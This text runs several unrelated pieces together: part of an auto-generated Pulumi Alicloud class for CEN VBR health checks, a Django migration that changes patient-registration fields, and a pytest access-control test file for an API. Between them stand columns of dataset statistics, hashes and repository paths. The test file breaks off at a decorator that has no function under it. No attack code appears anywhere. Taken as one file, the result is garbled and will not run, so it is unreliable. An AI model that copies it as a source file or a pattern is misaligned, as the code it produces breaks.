        For information about CEN VBR HealthCheck and how to use it, see [Manage CEN VBR HealthCheck](https://www.alibabacloud.com/help/en/doc-detail/71141.htm).

        > **NOTE:** Available in 1.88.0+

        ## Example Usage

        Basic Usage

        ```python
        import pulumi
        import pulumi_alicloud as alicloud

        # Create a cen vbr HealthCheck resource and use it.
        default_instance = alicloud.cen.Instance("defaultInstance", cen_instance_name="test_name")
        default_instance_attachment = alicloud.cen.InstanceAttachment("defaultInstanceAttachment",
            instance_id=default_instance.id,
            child_instance_id="vbr-xxxxx",
            child_instance_type="VBR",
            child_instance_region_id="cn-hangzhou")
        default_vbr_health_check = alicloud.cen.VbrHealthCheck("defaultVbrHealthCheck",
            cen_id=default_instance.id,
            health_check_source_ip="192.168.1.2",
            health_check_target_ip="10.0.0.2",
            vbr_instance_id="vbr-xxxxx",
            vbr_instance_region_id="cn-hangzhou",
            health_check_interval=2,
            healthy_threshold=8,
            opts=pulumi.ResourceOptions(depends_on=[default_instance_attachment]))
        ```

        ## Import

        CEN VBR HealthCheck can be imported using the id, e.g.

        ```sh
        $ pulumi import alicloud:cen/vbrHealthCheck:VbrHealthCheck example vbr-xxxxx:cn-hangzhou
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] cen_id: The ID of the CEN instance.
        :param pulumi.Input[int] health_check_interval: Specifies the interval at which the health check sends continuous detection packets. Default value: 2. Value range: 2 to 3.
        :param pulumi.Input[str] health_check_source_ip: The source IP address of health checks.
        :param pulumi.Input[str] health_check_target_ip: The destination IP address of health checks.
        :param pulumi.Input[int] healthy_threshold: Specifies the number of probe messages sent by the health check. Default value: 8. Value range: 3 to 8.
        :param pulumi.Input[str] vbr_instance_id: The ID of the VBR.
        :param pulumi.Input[int] vbr_instance_owner_id: The ID of the account to which the VBR belongs.
        :param pulumi.Input[str] vbr_instance_region_id: The ID of the region to which the VBR belongs.
        """
        ...

    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: VbrHealthCheckArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        This topic describes how to configure the health check feature for a Cloud Enterprise Network (CEN) instance.
        After you attach a Virtual Border Router (VBR) to the CEN instance and configure the health check feature, you can monitor the network conditions of the on-premises data center connected to the VBR.

        For information about CEN VBR HealthCheck and how to use it, see [Manage CEN VBR HealthCheck](https://www.alibabacloud.com/help/en/doc-detail/71141.htm).

        > **NOTE:** Available in 1.88.0+

        ## Example Usage

        Basic Usage

        ```python
        import pulumi
        import pulumi_alicloud as alicloud

        # Create a cen vbr HealthCheck resource and use it.
        default_instance = alicloud.cen.Instance("defaultInstance", cen_instance_name="test_name")
        default_instance_attachment = alicloud.cen.InstanceAttachment("defaultInstanceAttachment",
            instance_id=default_instance.id,
            child_instance_id="vbr-xxxxx",
            child_instance_type="VBR",
            child_instance_region_id="cn-hangzhou")
        default_vbr_health_check = alicloud.cen.VbrHealthCheck("defaultVbrHealthCheck",
            cen_id=default_instance.id,
            health_check_source_ip="192.168.1.2",
            health_check_target_ip="10.0.0.2",
            vbr_instance_id="vbr-xxxxx",
            vbr_instance_region_id="cn-hangzhou",
            health_check_interval=2,
            healthy_threshold=8,
            opts=pulumi.ResourceOptions(depends_on=[default_instance_attachment]))
        ```

        ## Import

        CEN VBR HealthCheck can be imported using the id, e.g.

        ```sh
        $ pulumi import alicloud:cen/vbrHealthCheck:VbrHealthCheck example vbr-xxxxx:cn-hangzhou
        ```

        :param str resource_name: The name of the resource.
        :param VbrHealthCheckArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...

    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Dispatch between the two overloads above: either a single
        # VbrHealthCheckArgs object or individual keyword arguments.
        resource_args, opts = _utilities.get_resource_args_opts(VbrHealthCheckArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       cen_id: Optional[pulumi.Input[str]] = None,
                       health_check_interval: Optional[pulumi.Input[int]] = None,
                       health_check_source_ip: Optional[pulumi.Input[str]] = None,
                       health_check_target_ip: Optional[pulumi.Input[str]] = None,
                       healthy_threshold: Optional[pulumi.Input[int]] = None,
                       vbr_instance_id: Optional[pulumi.Input[str]] = None,
                       vbr_instance_owner_id: Optional[pulumi.Input[int]] = None,
                       vbr_instance_region_id: Optional[pulumi.Input[str]] = None,
                       __props__=None):
        # Shared constructor body used by both public overloads.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource: build the props bag and enforce the
            # required properties (skipped when opts.urn is set, i.e. the
            # engine is rehydrating an existing resource).
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = VbrHealthCheckArgs.__new__(VbrHealthCheckArgs)

            if cen_id is None and not opts.urn:
                raise TypeError("Missing required property 'cen_id'")
            __props__.__dict__["cen_id"] = cen_id
            __props__.__dict__["health_check_interval"] = health_check_interval
            __props__.__dict__["health_check_source_ip"] = health_check_source_ip
            if health_check_target_ip is None and not opts.urn:
                raise TypeError("Missing required property 'health_check_target_ip'")
            __props__.__dict__["health_check_target_ip"] = health_check_target_ip
            __props__.__dict__["healthy_threshold"] = healthy_threshold
            if vbr_instance_id is None and not opts.urn:
                raise TypeError("Missing required property 'vbr_instance_id'")
            __props__.__dict__["vbr_instance_id"] = vbr_instance_id
            __props__.__dict__["vbr_instance_owner_id"] = vbr_instance_owner_id
            if vbr_instance_region_id is None and not opts.urn:
                raise TypeError("Missing required property 'vbr_instance_region_id'")
            __props__.__dict__["vbr_instance_region_id"] = vbr_instance_region_id
        super(VbrHealthCheck, __self__).__init__(
            'alicloud:cen/vbrHealthCheck:VbrHealthCheck',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            cen_id: Optional[pulumi.Input[str]] = None,
            health_check_interval: Optional[pulumi.Input[int]] = None,
            health_check_source_ip: Optional[pulumi.Input[str]] = None,
            health_check_target_ip: Optional[pulumi.Input[str]] = None,
            healthy_threshold: Optional[pulumi.Input[int]] = None,
            vbr_instance_id: Optional[pulumi.Input[str]] = None,
            vbr_instance_owner_id: Optional[pulumi.Input[int]] = None,
            vbr_instance_region_id: Optional[pulumi.Input[str]] = None) -> 'VbrHealthCheck':
        """
        Get an existing VbrHealthCheck resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] cen_id: The ID of the CEN instance.
        :param pulumi.Input[int] health_check_interval: Specifies the interval at which the health check sends continuous detection packets. Default value: 2. Value range: 2 to 3.
        :param pulumi.Input[str] health_check_source_ip: The source IP address of health checks.
        :param pulumi.Input[str] health_check_target_ip: The destination IP address of health checks.
        :param pulumi.Input[int] healthy_threshold: Specifies the number of probe messages sent by the health check. Default value: 8. Value range: 3 to 8.
        :param pulumi.Input[str] vbr_instance_id: The ID of the VBR.
        :param pulumi.Input[int] vbr_instance_owner_id: The ID of the account to which the VBR belongs.
        :param pulumi.Input[str] vbr_instance_region_id: The ID of the region to which the VBR belongs.
        """
        # Merging an id into opts tells the engine to look up existing state
        # rather than create a new resource.
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        __props__ = _VbrHealthCheckState.__new__(_VbrHealthCheckState)

        __props__.__dict__["cen_id"] = cen_id
        __props__.__dict__["health_check_interval"] = health_check_interval
        __props__.__dict__["health_check_source_ip"] = health_check_source_ip
        __props__.__dict__["health_check_target_ip"] = health_check_target_ip
        __props__.__dict__["healthy_threshold"] = healthy_threshold
        __props__.__dict__["vbr_instance_id"] = vbr_instance_id
        __props__.__dict__["vbr_instance_owner_id"] = vbr_instance_owner_id
        __props__.__dict__["vbr_instance_region_id"] = vbr_instance_region_id
        return VbrHealthCheck(resource_name, opts=opts, __props__=__props__)

    # --- Read-only output properties (resolved by the engine at runtime) ---

    @property
    @pulumi.getter(name="cenId")
    def cen_id(self) -> pulumi.Output[str]:
        """
        The ID of the CEN instance.
        """
        return pulumi.get(self, "cen_id")

    @property
    @pulumi.getter(name="healthCheckInterval")
    def health_check_interval(self) -> pulumi.Output[Optional[int]]:
        """
        Specifies the interval at which the health check sends continuous detection packets. Default value: 2. Value range: 2 to 3.
        """
        return pulumi.get(self, "health_check_interval")

    @property
    @pulumi.getter(name="healthCheckSourceIp")
    def health_check_source_ip(self) -> pulumi.Output[Optional[str]]:
        """
        The source IP address of health checks.
        """
        return pulumi.get(self, "health_check_source_ip")

    @property
    @pulumi.getter(name="healthCheckTargetIp")
    def health_check_target_ip(self) -> pulumi.Output[str]:
        """
        The destination IP address of health checks.
        """
        return pulumi.get(self, "health_check_target_ip")

    @property
    @pulumi.getter(name="healthyThreshold")
    def healthy_threshold(self) -> pulumi.Output[Optional[int]]:
        """
        Specifies the number of probe messages sent by the health check. Default value: 8. Value range: 3 to 8.
        """
        return pulumi.get(self, "healthy_threshold")

    @property
    @pulumi.getter(name="vbrInstanceId")
    def vbr_instance_id(self) -> pulumi.Output[str]:
        """
        The ID of the VBR.
        """
        return pulumi.get(self, "vbr_instance_id")

    @property
    @pulumi.getter(name="vbrInstanceOwnerId")
    def vbr_instance_owner_id(self) -> pulumi.Output[Optional[int]]:
        """
        The ID of the account to which the VBR belongs.
        """
        return pulumi.get(self, "vbr_instance_owner_id")

    @property
    @pulumi.getter(name="vbrInstanceRegionId")
    def vbr_instance_region_id(self) -> pulumi.Output[str]:
        """
        The ID of the region to which the VBR belongs.
        """
        return pulumi.get(self, "vbr_instance_region_id")
| 46.288014
| 206
| 0.670686
| 3,279
| 25,875
| 4.993596
| 0.070753
| 0.080616
| 0.057286
| 0.039453
| 0.899841
| 0.888237
| 0.884573
| 0.869305
| 0.86619
| 0.854159
| 0
| 0.004602
| 0.235865
| 25,875
| 558
| 207
| 46.370968
| 0.823538
| 0.336155
| 0
| 0.720137
| 1
| 0
| 0.135049
| 0.067652
| 0
| 0
| 0
| 0
| 0
| 1
| 0.16041
| false
| 0.003413
| 0.017065
| 0
| 0.273038
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c3bc2c3b6896e186793d6fcb0281c38136f93bed
| 4,235
|
py
|
Python
|
care/facility/migrations/0067_auto_20200402_1841.py
|
gigincg/care
|
07be6a7982b5c46a854e3435a52662f32800c8ae
|
[
"MIT"
] | 189
|
2020-03-17T17:18:58.000Z
|
2022-02-22T09:49:45.000Z
|
care/facility/migrations/0067_auto_20200402_1841.py
|
gigincg/care
|
07be6a7982b5c46a854e3435a52662f32800c8ae
|
[
"MIT"
] | 598
|
2020-03-19T21:22:09.000Z
|
2022-03-30T05:08:37.000Z
|
care/facility/migrations/0067_auto_20200402_1841.py
|
gigincg/care
|
07be6a7982b5c46a854e3435a52662f32800c8ae
|
[
"MIT"
] | 159
|
2020-03-19T18:45:56.000Z
|
2022-03-17T13:23:12.000Z
|
# Generated by Django 2.2.11 on 2020-04-02 18:41
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration (Django 2.2.11, 2020-04-02 18:41).

    Alters field options (blank/null/defaults/choices/verbose names) on
    ``patientregistration`` and its historical-table counterpart
    ``historicalpatientregistration``; the two sets of AlterField operations
    are intentionally identical.
    """

    dependencies = [
        ('facility', '0066_auto_20200402_1806'),
    ]

    operations = [
        migrations.AlterField(
            model_name='historicalpatientregistration',
            name='blood_group',
            field=models.CharField(blank=True, choices=[('A+', 'A+'), ('A-', 'A-'), ('B+', 'B+'), ('B-', 'B-'), ('AB+', 'AB+'), ('AB-', 'AB-'), ('O+', 'O+'), ('O-', 'O-')], max_length=4, null=True, verbose_name='Blood Group of Patient'),
        ),
        migrations.AlterField(
            model_name='historicalpatientregistration',
            name='countries_travelled',
            field=models.TextField(blank=True, default='', verbose_name='Countries Patient has Travelled to'),
        ),
        migrations.AlterField(
            model_name='historicalpatientregistration',
            name='date_of_return',
            field=models.DateTimeField(blank=True, null=True, verbose_name='Return Date from the Last Country if Travelled'),
        ),
        migrations.AlterField(
            model_name='historicalpatientregistration',
            name='disease_status',
            # NOTE(review): value 5 appears twice below ('RECOVERED' and
            # 'EXPIRED'); 'EXPIRED' was presumably meant to be 6 — TODO confirm
            # against the model. If so, fix the model and add a NEW migration;
            # do not edit this (likely already applied) one.
            field=models.IntegerField(blank=True, choices=[(1, 'SUSPECTED'), (2, 'POSITIVE'), (3, 'NEGATIVE'), (4, 'RECOVERY'), (5, 'RECOVERED'), (5, 'EXPIRED')], default=1, verbose_name='Disease Status'),
        ),
        migrations.AlterField(
            model_name='historicalpatientregistration',
            name='number_of_aged_dependents',
            field=models.IntegerField(blank=True, default=0, verbose_name='Number of people aged above 60 living with the patient'),
        ),
        migrations.AlterField(
            model_name='historicalpatientregistration',
            name='number_of_chronic_diseased_dependents',
            field=models.IntegerField(blank=True, default=0, verbose_name='Number of people who have chronic diseases living with the patient'),
        ),
        migrations.AlterField(
            model_name='historicalpatientregistration',
            name='present_health',
            field=models.TextField(blank=True, default='', verbose_name="Patient's Current Health Details"),
        ),
        migrations.AlterField(
            model_name='patientregistration',
            name='blood_group',
            field=models.CharField(blank=True, choices=[('A+', 'A+'), ('A-', 'A-'), ('B+', 'B+'), ('B-', 'B-'), ('AB+', 'AB+'), ('AB-', 'AB-'), ('O+', 'O+'), ('O-', 'O-')], max_length=4, null=True, verbose_name='Blood Group of Patient'),
        ),
        migrations.AlterField(
            model_name='patientregistration',
            name='countries_travelled',
            field=models.TextField(blank=True, default='', verbose_name='Countries Patient has Travelled to'),
        ),
        migrations.AlterField(
            model_name='patientregistration',
            name='date_of_return',
            field=models.DateTimeField(blank=True, null=True, verbose_name='Return Date from the Last Country if Travelled'),
        ),
        migrations.AlterField(
            model_name='patientregistration',
            name='disease_status',
            # NOTE(review): same duplicated choice value 5 as above.
            field=models.IntegerField(blank=True, choices=[(1, 'SUSPECTED'), (2, 'POSITIVE'), (3, 'NEGATIVE'), (4, 'RECOVERY'), (5, 'RECOVERED'), (5, 'EXPIRED')], default=1, verbose_name='Disease Status'),
        ),
        migrations.AlterField(
            model_name='patientregistration',
            name='number_of_aged_dependents',
            field=models.IntegerField(blank=True, default=0, verbose_name='Number of people aged above 60 living with the patient'),
        ),
        migrations.AlterField(
            model_name='patientregistration',
            name='number_of_chronic_diseased_dependents',
            field=models.IntegerField(blank=True, default=0, verbose_name='Number of people who have chronic diseases living with the patient'),
        ),
        migrations.AlterField(
            model_name='patientregistration',
            name='present_health',
            field=models.TextField(blank=True, default='', verbose_name="Patient's Current Health Details"),
        ),
    ]
| 50.416667
| 237
| 0.61464
| 431
| 4,235
| 5.902552
| 0.213457
| 0.110063
| 0.137579
| 0.159591
| 0.940252
| 0.940252
| 0.860849
| 0.841981
| 0.823113
| 0.823113
| 0
| 0.017375
| 0.238961
| 4,235
| 83
| 238
| 51.024096
| 0.771952
| 0.010862
| 0
| 0.909091
| 1
| 0
| 0.320277
| 0.083592
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.012987
| 0
| 0.051948
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c3c09a5694befd46a62cc1eb0446cbad360a1bf7
| 23,792
|
py
|
Python
|
tests/integration/test_access.py
|
alexcfaber/katka-core
|
39a09f76b052f879ad5c0d53b74593c049930d5e
|
[
"Apache-2.0"
] | null | null | null |
tests/integration/test_access.py
|
alexcfaber/katka-core
|
39a09f76b052f879ad5c0d53b74593c049930d5e
|
[
"Apache-2.0"
] | null | null | null |
tests/integration/test_access.py
|
alexcfaber/katka-core
|
39a09f76b052f879ad5c0d53b74593c049930d5e
|
[
"Apache-2.0"
] | null | null | null |
import pytest
from tests.integration.conftest import anonymous_client, scoped_client, user_client
@pytest.mark.django_db
class TestList:
    """Access-control matrix for the list endpoints.

    Each case drives one client type (anonymous / user / scoped token) at one
    list URL and checks both the HTTP status and, when access is granted, the
    number of visible items.
    """

    @pytest.mark.parametrize(
        ("client_ctx_manager", "url", "http_status", "expected_length"),
        [
            (anonymous_client, "/applications/", 403, None),
            (anonymous_client, "/applications/{application.public_identifier}/metadata/", 403, None),
            (anonymous_client, "/teams/", 403, None),
            (anonymous_client, "/projects/", 403, None),
            (anonymous_client, "/credentials/", 403, None),
            (anonymous_client, "/credentials/{credential.public_identifier}/secrets/", 403, None),
            (anonymous_client, "/scm-services/", 403, None),
            (anonymous_client, "/scm-repositories/", 403, None),
            (anonymous_client, "/scm-pipeline-runs/", 403, None),
            (anonymous_client, "/scm-step-runs/", 403, None),
            (anonymous_client, "/scm-releases/", 403, None),
            (user_client, "/applications/", 200, 2),
            (user_client, "/applications/{application.public_identifier}/metadata/", 200, 1),
            (user_client, "/teams/", 200, 2),
            (user_client, "/projects/", 200, 2),
            (user_client, "/credentials/", 200, 3),  # 3 because of my_other_teams_credential
            (user_client, "/credentials/{credential.public_identifier}/secrets/", 200, 1),  # only one per credential
            (user_client, "/scm-services/", 200, 2),
            (user_client, "/scm-repositories/", 200, 2),
            (user_client, "/scm-pipeline-runs/", 200, 4),
            (user_client, "/scm-step-runs/", 200, 2),
            (user_client, "/scm-releases/", 200, 2),
            (scoped_client, "/applications/", 200, 3),
            (scoped_client, "/applications/{application.public_identifier}/metadata/", 200, 1,),
            (scoped_client, "/teams/", 200, 3),
            (scoped_client, "/projects/", 200, 3),
            (scoped_client, "/credentials/", 200, 4),  # 4 because of my_other_teams_credential
            (scoped_client, "/credentials/{credential.public_identifier}/secrets/", 200, 1),  # only one per credential
            (scoped_client, "/scm-services/", 200, 2),
            (scoped_client, "/scm-repositories/", 200, 3),
            (scoped_client, "/scm-pipeline-runs/", 200, 5),
            (scoped_client, "/scm-step-runs/", 200, 3),
            (scoped_client, "/scm-releases/", 200, 3),
        ],
    )
    def test_list(self, client_ctx_manager, url, http_status, expected_length, most_models):
        with client_ctx_manager() as client:
            # Fill URL placeholders (e.g. {application.public_identifier})
            # from the fixture objects in most_models.
            url = url.format(**most_models)
            response = client.get(url)
            assert response.status_code == http_status
            if expected_length is not None:
                # Only count items when the request was expected to succeed.
                parsed = response.json()
                assert len(parsed) == expected_length
@pytest.mark.django_db
class TestGet:
    """Access-control matrix for detail (GET) endpoints.

    Covers anonymous (403), the owning user (200, or 404 for objects that
    belong to someone else) and the scoped-token client (200).
    """

    @pytest.mark.parametrize(
        ("client_ctx_manager", "url", "http_status"),
        [
            (anonymous_client, "/applications/{application.public_identifier}/", 403),
            (anonymous_client, "/applications/unknown/", 403),
            (anonymous_client, "/applications/{application.public_identifier}/metadata/{metadata.key}/", 403),
            (anonymous_client, "/teams/{team.public_identifier}/", 403),
            (anonymous_client, "/projects/{project.public_identifier}/", 403),
            (anonymous_client, "/credentials/{credential.public_identifier}/", 403),
            (anonymous_client, "/credentials/{credential.public_identifier}/secrets/{secret.key}/", 403),
            (anonymous_client, "/scm-services/{service.public_identifier}/", 403),
            (anonymous_client, "/scm-repositories/{repository.public_identifier}/", 403),
            (anonymous_client, "/scm-pipeline-runs/{pipeline_run.public_identifier}/", 403),
            (anonymous_client, "/scm-step-runs/{step_run.public_identifier}/", 403),
            (anonymous_client, "/scm-releases/{release.public_identifier}/", 403),
            (user_client, "/applications/{application.public_identifier}/", 200),
            (user_client, "/applications/unknown/", 404),
            (user_client, "/applications/{application.public_identifier}/metadata/{metadata.key}/", 200),
            (user_client, "/teams/{team.public_identifier}/", 200),
            (user_client, "/projects/{project.public_identifier}/", 200),
            (user_client, "/credentials/{credential.public_identifier}/", 200),
            (user_client, "/credentials/{credential.public_identifier}/secrets/{secret.key}/", 200),
            (user_client, "/scm-services/{service.public_identifier}/", 200),
            (user_client, "/scm-repositories/{repository.public_identifier}/", 200),
            (user_client, "/scm-pipeline-runs/{pipeline_run.public_identifier}/", 200),
            (user_client, "/scm-step-runs/{step_run.public_identifier}/", 200),
            (user_client, "/scm-releases/{release.public_identifier}/", 200),
            # check user_client, but this time with everything that does not belong to that user
            (user_client, "/applications/{not_my_application.public_identifier}/", 404),
            (user_client, "/applications/{not_my_application.public_identifier}/metadata/{not_my_metadata.key}/", 404),
            (user_client, "/teams/{not_my_team.public_identifier}/", 404),
            (user_client, "/projects/{not_my_project.public_identifier}/", 404),
            (user_client, "/credentials/{not_my_credential.public_identifier}/", 404),
            (user_client, "/credentials/{not_my_credential.public_identifier}/secrets/{not_my_secret.key}/", 404),
            # no need to check services again, since they are all public
            (user_client, "/scm-repositories/{not_my_repository.public_identifier}/", 404),
            (user_client, "/scm-pipeline-runs/{not_my_pipeline_run.public_identifier}/", 404),
            (user_client, "/scm-step-runs/{not_my_step_run.public_identifier}/", 404),
            (user_client, "/scm-releases/{not_my_release.public_identifier}/", 404),
            (scoped_client, "/applications/{application.public_identifier}/", 200),
            (scoped_client, "/applications/{application.public_identifier}/metadata/{metadata.key}/", 200),
            (scoped_client, "/teams/{team.public_identifier}/", 200),
            (scoped_client, "/projects/{project.public_identifier}/", 200),
            (scoped_client, "/credentials/{credential.public_identifier}/", 200),
            (scoped_client, "/credentials/{credential.public_identifier}/secrets/{secret.key}/", 200),
            (scoped_client, "/scm-services/{service.public_identifier}/", 200),
            (scoped_client, "/scm-repositories/{repository.public_identifier}/", 200),
            (scoped_client, "/scm-pipeline-runs/{pipeline_run.public_identifier}/", 200),
            (scoped_client, "/scm-step-runs/{step_run.public_identifier}/", 200),
            (scoped_client, "/scm-releases/{release.public_identifier}/", 200),
        ],
    )
    def test_get(self, client_ctx_manager, url, http_status, most_models):
        with client_ctx_manager() as client:
            # Fill URL placeholders from the fixture objects in most_models.
            url = url.format(**most_models)
            response = client.get(url)
            assert response.status_code == http_status
@pytest.mark.django_db
class TestDelete:
    """Access-control matrix for DELETE endpoints.

    Expected statuses: 403 anonymous, 204 successful delete, 404 not visible
    to this user, 405 where deletion is not allowed at all (scm-services,
    scm-releases).
    """

    @pytest.mark.parametrize(
        ("client_ctx_manager", "url", "http_status"),
        [
            (anonymous_client, "/applications/{application.public_identifier}/", 403),
            (anonymous_client, "/applications/unknown/", 403),
            (anonymous_client, "/applications/{application.public_identifier}/metadata/{metadata.key}/", 403),
            (anonymous_client, "/teams/{team.public_identifier}/", 403),
            (anonymous_client, "/projects/{project.public_identifier}/", 403),
            (anonymous_client, "/credentials/{credential.public_identifier}/", 403),
            (anonymous_client, "/credentials/{credential.public_identifier}/secrets/{secret.key}/", 403),
            (anonymous_client, "/scm-services/{service.public_identifier}/", 403),
            (anonymous_client, "/scm-repositories/{repository.public_identifier}/", 403),
            (anonymous_client, "/scm-pipeline-runs/{pipeline_run.public_identifier}/", 403),
            (anonymous_client, "/scm-step-runs/{step_run.public_identifier}/", 403),
            (anonymous_client, "/scm-releases/{release.public_identifier}/", 403),
            (user_client, "/applications/{application.public_identifier}/", 204),
            (user_client, "/applications/unknown/", 404),
            (user_client, "/applications/{application.public_identifier}/metadata/{metadata.key}/", 204),
            (user_client, "/teams/{team.public_identifier}/", 204),
            (user_client, "/projects/{project.public_identifier}/", 204),
            (user_client, "/credentials/{credential.public_identifier}/", 204),
            (user_client, "/credentials/{credential.public_identifier}/secrets/{secret.key}/", 204),
            (user_client, "/scm-services/{service.public_identifier}/", 405),
            (user_client, "/scm-repositories/{repository.public_identifier}/", 204),
            (user_client, "/scm-pipeline-runs/{pipeline_run.public_identifier}/", 204),
            (user_client, "/scm-step-runs/{step_run.public_identifier}/", 204),
            (user_client, "/scm-releases/{release.public_identifier}/", 405),
            # check user_client, but this time with everything that does not belong to that user
            (user_client, "/applications/{not_my_application.public_identifier}/", 404),
            (user_client, "/applications/{not_my_application.public_identifier}/metadata/{not_my_metadata.key}/", 404),
            (user_client, "/teams/{not_my_team.public_identifier}/", 404),
            (user_client, "/projects/{not_my_project.public_identifier}/", 404),
            (user_client, "/credentials/{not_my_credential.public_identifier}/", 404),
            (user_client, "/credentials/{not_my_credential.public_identifier}/secrets/{not_my_secret.key}/", 404),
            # no need to check services again, since they are all public
            (user_client, "/scm-repositories/{not_my_repository.public_identifier}/", 404),
            (user_client, "/scm-pipeline-runs/{not_my_pipeline_run.public_identifier}/", 404),
            (user_client, "/scm-step-runs/{not_my_step_run.public_identifier}/", 404),
            (user_client, "/scm-releases/{not_my_release.public_identifier}/", 405),
            (scoped_client, "/applications/{application.public_identifier}/", 204),
            (scoped_client, "/applications/{application.public_identifier}/metadata/{metadata.key}/", 204),
            (scoped_client, "/teams/{team.public_identifier}/", 204),
            (scoped_client, "/projects/{project.public_identifier}/", 204),
            (scoped_client, "/credentials/{credential.public_identifier}/", 204),
            (scoped_client, "/credentials/{credential.public_identifier}/secrets/{secret.key}/", 204),
            (scoped_client, "/scm-services/{service.public_identifier}/", 405),
            (scoped_client, "/scm-repositories/{repository.public_identifier}/", 204),
            (scoped_client, "/scm-pipeline-runs/{pipeline_run.public_identifier}/", 204),
            (scoped_client, "/scm-step-runs/{step_run.public_identifier}/", 204),
            (scoped_client, "/scm-releases/{release.public_identifier}/", 405),
        ],
    )
    def test_delete(self, client_ctx_manager, url, http_status, most_models):
        with client_ctx_manager() as client:
            # Fill URL placeholders from the fixture objects in most_models.
            url = url.format(**most_models)
            response = client.delete(url)
            assert response.status_code == http_status
@pytest.mark.django_db
class TestUpdate:
    """Access-control matrix for full-update (PUT) endpoints.

    The PUT body is empty, so where update is permitted the endpoint returns
    400 (validation failure) rather than 200; 405 marks read-only resources.
    """

    @pytest.mark.parametrize(
        ("client_ctx_manager", "url", "http_status"),
        [
            (anonymous_client, "/applications/{application.public_identifier}/", 403),
            (anonymous_client, "/applications/unknown/", 403),
            (anonymous_client, "/applications/{application.public_identifier}/metadata/{metadata.key}/", 403),
            (anonymous_client, "/teams/{team.public_identifier}/", 403),
            (anonymous_client, "/projects/{project.public_identifier}/", 403),
            (anonymous_client, "/credentials/{credential.public_identifier}/", 403),
            (anonymous_client, "/credentials/{credential.public_identifier}/secrets/{secret.key}/", 403),
            (anonymous_client, "/scm-services/{service.public_identifier}/", 403),
            (anonymous_client, "/scm-repositories/{repository.public_identifier}/", 403),
            (anonymous_client, "/scm-pipeline-runs/{pipeline_run.public_identifier}/", 403),
            (anonymous_client, "/scm-step-runs/{step_run.public_identifier}/", 403),
            (anonymous_client, "/scm-releases/{release.public_identifier}/", 403),
            # since the put has incomplete data, we expect a 400 when we are allowed, not a 200 like with patch
            (user_client, "/applications/{application.public_identifier}/", 400),
            (user_client, "/applications/unknown/", 404),
            (user_client, "/applications/{application.public_identifier}/metadata/{metadata.key}/", 400),
            (user_client, "/teams/{team.public_identifier}/", 400),
            (user_client, "/projects/{project.public_identifier}/", 400),
            (user_client, "/credentials/{credential.public_identifier}/", 400),
            (user_client, "/credentials/{credential.public_identifier}/secrets/{secret.key}/", 400),
            (user_client, "/scm-services/{service.public_identifier}/", 405),
            (user_client, "/scm-repositories/{repository.public_identifier}/", 400),
            (user_client, "/scm-pipeline-runs/{pipeline_run.public_identifier}/", 400),
            (user_client, "/scm-step-runs/{step_run.public_identifier}/", 400),
            (user_client, "/scm-releases/{release.public_identifier}/", 405),
            # check user_client, but this time with everything that does not belong to that user
            (user_client, "/applications/{not_my_application.public_identifier}/", 404),
            (user_client, "/applications/{not_my_application.public_identifier}/metadata/{not_my_metadata.key}/", 404),
            (user_client, "/teams/{not_my_team.public_identifier}/", 404),
            (user_client, "/projects/{not_my_project.public_identifier}/", 404),
            (user_client, "/credentials/{not_my_credential.public_identifier}/", 404),
            (user_client, "/credentials/{not_my_credential.public_identifier}/secrets/{not_my_secret.key}/", 404),
            # no need to check services again, since they are all public
            (user_client, "/scm-repositories/{not_my_repository.public_identifier}/", 404),
            (user_client, "/scm-pipeline-runs/{not_my_pipeline_run.public_identifier}/", 404),
            (user_client, "/scm-step-runs/{not_my_step_run.public_identifier}/", 404),
            (user_client, "/scm-releases/{not_my_release.public_identifier}/", 405),
            (scoped_client, "/applications/{application.public_identifier}/", 400),
            (scoped_client, "/applications/{application.public_identifier}/metadata/{metadata.key}/", 400),
            (scoped_client, "/teams/{team.public_identifier}/", 400),
            (scoped_client, "/projects/{project.public_identifier}/", 400),
            (scoped_client, "/credentials/{credential.public_identifier}/", 400),
            (scoped_client, "/credentials/{credential.public_identifier}/secrets/{secret.key}/", 400),
            (scoped_client, "/scm-services/{service.public_identifier}/", 405),
            (scoped_client, "/scm-repositories/{repository.public_identifier}/", 400),
            (scoped_client, "/scm-pipeline-runs/{pipeline_run.public_identifier}/", 400),
            (scoped_client, "/scm-step-runs/{step_run.public_identifier}/", 400),
            (scoped_client, "/scm-releases/{release.public_identifier}/", 405),
        ],
    )
